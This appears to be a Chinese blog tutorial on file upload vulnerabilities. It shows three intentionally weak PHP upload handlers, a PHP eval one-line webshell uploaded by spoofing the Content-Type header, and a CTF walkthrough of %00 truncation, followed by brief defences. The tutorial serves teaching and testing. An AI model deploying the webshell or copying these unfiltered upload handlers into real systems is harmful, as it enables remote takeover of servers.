文件上传漏洞原理与实例测试

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量1w 收藏 10
点赞数 4

0x00 什么是文件上传


  • 为了让用户将文件上传到网站,就像是给危机服务器的恶意用户打开了另一扇门。即便如此,在今天的现代互联网的Web应用程序,它是一种常见的要求,因为它有助于提高业务效率。企业支持门户,给用户各企业员工有效地共享文件。允许用户上传图片,视频,头像和许多其他类型的文件。向用户提供的功能越多,Web应用受到攻击的风险和机会就越大,这种功能会被恶意用户利用,获得到一个特定网站的权限,或危及服务器的可能性是非常高的。

0x01 为什么文件上传存在漏洞

  • 上传文件的时候,如果服务器脚本语言,未对上传的文件进行严格的验证和过滤,就容易造成上传任意文件,包括上传脚本文件。

  • 如果是正常的PHP文件,对服务器则没有任何危害。

  • PHP可以像其他的编程语言一样,可以查看目录下的文件,查看文件中的吗内容,可以执行系统命令等。

  • 上传文件的时候,如果服务器端脚本语言,未对上传的文件进行严格的验证和过滤,就有可能上传恶意的PHP文件,从而控制整个网站,甚至是服务器。这个恶意的PHP文件,又被称为WebShell。


0x02 哪里存在文件上传漏洞


  • 服务器配置不当

  • 开源编辑器的上传漏洞

  • 本地文件上传限制被绕过

  • 过滤不严或被绕过

  • 文件解析漏洞导致文件执行

  • 文件路径截断


0x03 文件上传实例(本地测试)


  • 裸体的文件上传


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!DOCTYPE html>
<html>
<head>
     <title>文件信息</title>
</head>
<meta charset= "utf-8" >
<body>
<form action= ""  enctype= "multipart/form-data"  method= "POST"  name= "uploadfile" >
     上传文件: <input type= "file"  name= "upfile"  />
     <input type= "submit"  value= "上传"  name= "submit" >
</form>
</body>
</html>
<!-- 完全没有过滤,任意文件上传 -->
<?php
if  (isset( $_POST [ 'submit' ])) {
     var_dump( $_FILES [ 'upfile' ]);
     echo  "文件名:" . $_FILES [ 'upfile' ][ 'name' ]. "<br />" ;
     echo  "文件大小:" . $_FILES [ 'upfile' ][ 'size' ]. "<br />" ;
     echo  "文件类型:" . $_FILES [ 'upfile' ][ 'type' ]. "<br />" ;
     echo  "临时路径:" . $_FILES [ 'upfile' ][ 'tmp_name' ]. "<br />" ;
     echo  "上传后系统返回值:" . $_FILES [ 'upfile' ][ 'error' ]. "<br />" ;
     echo  "====================保存分各线========================<br />" ;
     if  ( $_FILES [ 'upfile' ][ 'error' ] == 0) {
         if  (! is_dir ( "./upload" )) {
             mkdir ( "./upload" );
         }
         $dir  "./upload/" . $_FILES [ 'upfile' ][ 'name' ];
         move_uploaded_file( $_FILES [ 'upfile' ][ 'tmp_name' ], $dir );
         echo  "文件保存路径:" . $dir . "<br />" ;
         echo  "上传成功...<br />" ;
         echo  "图片预览:<br />" ;
         echo  "<img src=" . $dir . ">" ;
     }
}
  ?>

wKioL1eQ76Sxy2zxAARTCLGSSbw832.png-wh_50

设置本地代理用Burp Suite 抓包,通过对比我们可以看到,PHP中的<文件名>和<文件类型>分别对应数据包中<filename>和<Content-Type>。


  • 穿上下内衣的文件上传


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<!DOCTYPE html>
<html>
<head>
     <title>文件信息</title>
</head>
<meta charset= "utf-8" >
<body>
<form action= ""  enctype= "multipart/form-data"  method= "POST"  name= "uploadfile" >
     上传文件: <input type= "file"  name= "upfile"  />
     <input type= "submit"  value= "上传"  name= "submit" >
</form>
</body>
</html>
<!-- 按文件类型过滤 -->
<?php
if  (isset( $_POST [ 'submit' ])) {
     var_dump( $_FILES [ 'upfile' ]);
     echo  "文件名:" . $_FILES [ 'upfile' ][ 'name' ]. "<br />" ;
     echo  "文件大小:" . $_FILES [ 'upfile' ][ 'size' ]. "<br />" ;
     echo  "文件类型:" . $_FILES [ 'upfile' ][ 'type' ]. "<br />" ;
     echo  "临时路径:" . $_FILES [ 'upfile' ][ 'tmp_name' ]. "<br />" ;
     echo  "上传后系统返回值:" . $_FILES [ 'upfile' ][ 'error' ]. "<br />" ;
     echo  "====================保存分各线========================<br />" ;
     $flag  = 0;
     switch  ( $_FILES [ 'upfile' ][ 'type' ]) {
         case  'image/jpeg' :
             $flag  = 1;
             break ;
         default :
             die ( "文件类型错误....." );
             break ;
     }
     if  ( $_FILES [ 'upfile' ][ 'error' ] == 0 &&  $flag  ) {
         if  (! is_dir ( "./upload" )) {
             mkdir ( "./upload" );
         }
     $dir  "./upload/" . $_FILES [ 'upfile' ][ 'name' ];
     move_uploaded_file( $_FILES [ 'upfile' ][ 'tmp_name' ], $dir );
     echo  "文件保存路径:" . $dir . "<br />" ;
         echo  "上传成功...<br />" ;
         echo  "图片预览:<br />" ;
         echo  "<img src=" . $dir . ">" ;
     }
}
  ?>

在这段代码里,我们通过 <$_FILES['upfile']['type']> 来检测文件上传的类型,通过第一个图里的对比我们知道Http数据包请求头里的<Content-Type >对应的是上传文件的类型,那么我们是不是可以通过修改数据包的内容来实验绕过.ok,现在我们上传一个PHP一句话木马。

1
2
3
4
<?php
@ eval ( $_POST [ 'xxx' ]);
echo  "dahuiji...." ;
  ?>

wKiom1eQ8A-heWV_AAN7oia3xR0984.png-wh_50

看返回的页面我们知道我们成功绕过了对文件类型的检测,并且菜刀连接成功


  • 穿上上内衣的文件上传(一个十六进制的<00>截断的ctf)


1
url:http://ctf4.shiyanbar.com/web/upload/

wKiom1eQ8FTiYY4vAAKvHgT5rdc341.png-wh_50

首先我们对抓取的数据包做出以上修改

wKioL1eQ8HDSTJYvAAMqvXprP68080.png-wh_50

通过16进制我们知道 <.>的16进制是<2e>在<2e>出插入一个字节,右键菜单里有<insert byte>插入。

wKiom1eQ8JOSXUmnAAI3-KDfuXc717.png-wh_50

ok,现在我们成功获取了flag。

现在我们说下这个实验的实现原理:

1
2
3
4
5
6
7
8
9
1.为什么在文件后面加上<.jpg>和在数据包< uploads />后面加上修改后的文件名?
      PHP在对文件后缀进行判断时是对最后一个 <.xxx> 来判断的。这样我们修改过后的文件
   名,PHP会将其判断为.jpg文件这样我们可以绕过对文件名的检测。
   
2.为什么我们对文件名修改过后还需要添加%00截断?
     尽管我们知道我们上传的是一个PHP文件,但是如果不进行%00截断,我们上传的文件在服务
   器上是以< xxx.php.jpg >格式保存也就是说这是一个图片文件,PHP是不会解析这个文件。
   当我们进行%00截断后,服务器就会将%00后的<.jpg>进行截断,这是我们的的文件将以< xxx.php >
   的形式保存在服务器上,我们的一句话木马也就成功的时上传成功了。


  • 穿上外套的文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<!DOCTYPE html>
<html>
<head>
     <title>文件信息</title>
</head>
<meta charset= "utf-8" >
<body>
<form action= ""  enctype= "multipart/form-data"  method= "POST"  name= "uploadfile" >
     上传文件: <input type= "file"  name= "upfile"  />
     <input type= "submit"  value= "上传"  name= "submit" >
</form>
</body>
</html>
<?php
if  (isset( $_POST [ 'submit' ])) {
     var_dump( $_FILES [ 'upfile' ]);
     echo  "文件名:" . $_FILES [ 'upfile' ][ 'name' ]. "<br />" ;
     echo  "文件大小:" . $_FILES [ 'upfile' ][ 'size' ]. "<br />" ;
     echo  "文件类型:" . $_FILES [ 'upfile' ][ 'type' ]. "<br />" ;
     echo  "临时路径:" . $_FILES [ 'upfile' ][ 'tmp_name' ]. "<br />" ;
     echo  "上传后系统返回值:" . $_FILES [ 'upfile' ][ 'error' ]. "<br />" ;
     echo  "====================保存分各线========================<br />" ;
     $flag  = 0;
     $path_parts  pathinfo ( $_FILES [ 'upfile' ][ 'name' ]);
     echo  '---<br>' ;
     var_dump( $path_parts );     //返回文件路径信息
     if  ( $path_parts [ 'extension' ] ==  'jpg'  &&  $_FILES [ 'upfile' ][ 'type' ] ==  'image/jpeg' ) {
         $flag  = 1;
     } else {
         die ( "文件类型错误...." );
     }
     if  ( $_FILES [ 'upfile' ][ 'error' ] == 0 &&  $flag  ) {
         if  (! is_dir ( "./upload" )) {
             mkdir ( "./upload" );
         }
         $dir  "./upload/" . $_FILES [ 'upfile' ][ 'name' ];
         echo  "文件保存路径:" . $dir . "<br />" ;
         move_uploaded_file( $_FILES [ 'upfile' ][ 'tmp_name' ], $dir );
         echo  "上传成功...<br />" ;
         echo  "图片预览:<br />" ;
         echo  "<img src=" . $dir . ">" ;
     }
}
  ?>

上传一张正常的图片。

wKioL1eQ8Yjz_KUcAAF_fGZhspg079.png-wh_50


上传一句话木马进行绕过检测

wKiom1eQ8a_wyICPAAK-fyWsCeQ590.png-wh_50

1
2
3
4
5
6
7
为什么这次不能进行绕过?
      我们对文件名进行截断后,当数据包到Apache的时候,Apache会对截断处理这时截断的文件
      名变为< xxx.php >当PHP判断时会发现文件的后缀为< php >,然后我们就上传失败了....
 
  (以上只是我对上传失败的一点理解,欢迎指正。
   欢迎技术讨论,可以将上述方法绕过的同学欢迎指教。
   致谢...)


0x04 上传漏洞的防御


  1. 对面文件后缀进行检测

  2. 对文件类型进行检测

  3. 对文件内容进行检测

  4. 设置上传白名单


本文出自 “启思·朝圣者” 博客

wuqiongrj
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web安全技术-实验六文件上传漏洞.doc
08-20
web安全技术-实验六文件上传漏洞
上传漏洞攻击防御
weixin_46273733的博客
08-13 609
一、实验名称 上传漏洞攻击防御 二、实验环境(详细说明运行的系统、平台及代码等) 1、攻击机系统环境:Windows 7/8/10 2、浏览器:Firefox 53.0.2(64位) 3、浏览器插件HackBar 1.6.3.1 4、中国菜刀20160620版 5、BurpSuite 1.7.11 三、实验步骤及结果 1、上传之利用PHP5.6.6截断漏洞绕过 漏洞地址:http://222.18.158.243:8007/ 漏洞代码: if(!empty($_FILES
【CTF-Web】文件上传漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 1680
文件上传漏洞学习笔记,ctfshow题目为依托
Web安全-之文件上传漏洞场景
华为云官方博客
09-02 4118
1上传漏洞危害介绍 上传是Web中最常见的功能,如果上传功能存在设计、编码缺陷,就容易形成上传漏洞,从而成为致命的安全问题,攻击者可以通过上传脚本木马,实现查看/篡改/删除源码和任意涂鸦网页,可以连接和操作对应的数据库,还可以通过操作系统漏洞、配置缺陷、信息泄露进行提权,获取操作系统提权,因此上传功能是Web安全测试中重点关注的高风险模块。 2上传漏洞原因分析 上传漏洞形成的原因...
一文爽 文件上传漏洞原理、方法和类型详细解析
MachineGunJoe666
05-23 1285
文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
网络安全进阶学习第五课——文件上传漏洞
p36273的博客
07-03 4563
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
文件上传漏洞练习靶场upload-labs
07-05
Upload-Labs是一个专门用于学习和实践文件上传漏洞的靶场,它包含了各种类型的文件上传漏洞实例,可以帮助用户深入理解这类漏洞的工作原理,并掌握如何进行防范和利用。 在Upload-Labs靶场中,你可以遇到以下几种...
webservice文件上传下载.zip
10-21
综上所述,"webservice文件上传下载.zip"是一个关于如何使用Web服务进行文件操作的实例,涵盖了文件上传、下载的基本原理以及相关的安全措施。通过学习和实践这个示例,开发者可以更好地理解和应用Web服务技术。
JAVA上百实例源码以及开源项目源代码
09-17
 Java数据压缩与传输实例,可以学习一下实例化套按字、得到文件输入流、压缩输入流、文件输出流、实例化缓冲区、写入数据到文件、关闭输入流、关闭套接字关闭输出流、输出错误信息等Java编程小技巧。 Java数组倒置...
ASP网站CMS程序源码——TinaCMS v1.2 MYSQL加强版实例开发.rar
10-17
6. **测试与优化**:在正式上线前,进行功能测试、性能测试和兼容性测试,确保网站在各种环境下正常运行。 7. **日常维护**:定期更新系统和插件,修复可能出现的安全漏洞,保持系统的稳定和安全。 8. **用户培训*...
利用漏洞注入之SQL注入
11-10
在6.2章节,我们探讨了上传Webshell作为文件包含漏洞的利用方式。尽管直接将PHP文件改名为图像文件(如"webshell.jpg")可以绕过文件类型检查,但服务器会将其视为图像,不会执行其中的PHP代码。因此,使用Burp ...
网络安全-文件上传漏洞原理攻击防御
关注网络安全、云原生安全
08-16 1万+
介绍 文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全。文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。 分类 根据简介,主要分为上传(客户端)、解析(服务端)两大类。 上传-javascript检测 简介 通过js代码,对文件后缀进行判断。 原理 一般使用白名单或黑名单的方式,判断文件后缀,根据后缀决定用户是否上传攻击 Firebug插件删除判断函数 使用靶机pikachu做例子,直接通
xargs 实现多文件过滤查找(xargs grep)
qq_43701814的博客
09-11 823
find . -type f -name ‘*’ | xargs grep -i ‘nr’ find到多个文件,从文件中过滤’NR’关键字 ls | xargs grep -i ‘Line’ ls到多个文件,从文件中过滤’Line’关键字
WEB渗透——文件上传漏洞(一)
果子哥丶的博客
03-13 1031
文件上传漏洞(一) 环境准备: OWASP_Broken_Web_Apps —— 靶机 Kali_Linux-2018.2-vm-amd64 —— 攻击文件上传漏洞原理: 制作PHP文件——一句话木马 chopper就是密码 利用文件上传漏洞,原本是要求上传image,但却可以上传PHP文件。上传成功后在网页加载该文件,将 …/…/hackable/uploads/Xshell....
Web渗透-文件上传漏洞知识总结及漏洞复现
陈珺的博客
08-15 1473
文件上传漏洞知识总结及漏洞复现文件上传概要文件上传漏洞成因文件解析漏洞路径截断IIS 5.x/6.0解析漏洞绕过上传漏洞漏洞修复/应对方法文件上传漏洞复现 文件上传概要 Web应用程序通常会有文件上传功能,例如论坛的附件上传上传图片/头像/Zip压缩包等,只要被Web应用程序允许上传文件,就可能存在文件上传漏洞。在不对被上传的文件进行限制/过滤或者限制被绕过,从而上传恶意文件、可执行脚本到服务器上,进一步导致服务器沦陷 如何确认Web应用程序是否存在上传漏洞呢?例如论坛由PHP开发,用户可上传头像,也就是
学习笔记文件上传漏洞原理
明哥哥知识分享
08-19 1833
一、文件上传漏洞概念 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 二. 造成文件上传漏洞的原因 1 对于上传文件的后缀名(扩展名)没有做较为严格的限制 2 对于上传文件的MIMETYPE(用于描
渗透测试-文件上传漏洞
weixin_43148062的博客
04-13 2414
WebShell与WebShell管理工具 文件上传漏洞概述 文件上传漏洞绕过 文件上传漏洞防御 一、WebShell与WebShell管理工具 什么是WebShell webshell,简称网页后门,简单的来说它是运行在web应用之上的远程控制程序。 webshell其实就是一张网页,由php、jsp、asp、asp.net等这类web应用程序语言开发,但webshell并不具备常见网页的...
web安全之文件上传漏洞攻击与防范方法
热门推荐
u014609111的博客
09-29 5万+
一、 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传漏洞本身就是一个危害巨大的漏洞,WebShell更是将这种漏洞的利用无限扩大。大多数的上传漏洞被利用后攻击者都会留下
web安全--文件上传漏洞实例操作
u010625568的博客
06-28 639
1. 进入owasp靶机测试环境,进入dvwa,login登录名和密码都为admin2 2. 进入DVWA Security选择安全级别,首先选择低安全级别 3. 进入upload 可以选择右下角的view resource 查看后端源码可以上传文件的类型等,也可以进行安全等级的源码比较。低安全级别可以上传任何文件类型,并没有什么限制,这就可以上传mumawen文件等。 4. 选择中安全级别,限制了文件类型,只能上传image/jpeg类型文件,此时想要上传其他文件就需要其他工具进行协助。 .
文件上传漏洞原理与利用
05-18
文件上传漏洞是指攻击者通过应用程序的文件上传功能,上传恶意文件或脚本文件到服务器上并执行,从而实现攻击的一种漏洞攻击者可以通过文件上传漏洞上传包含恶意代码的文件,如WebShell、木马程序等,从而获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值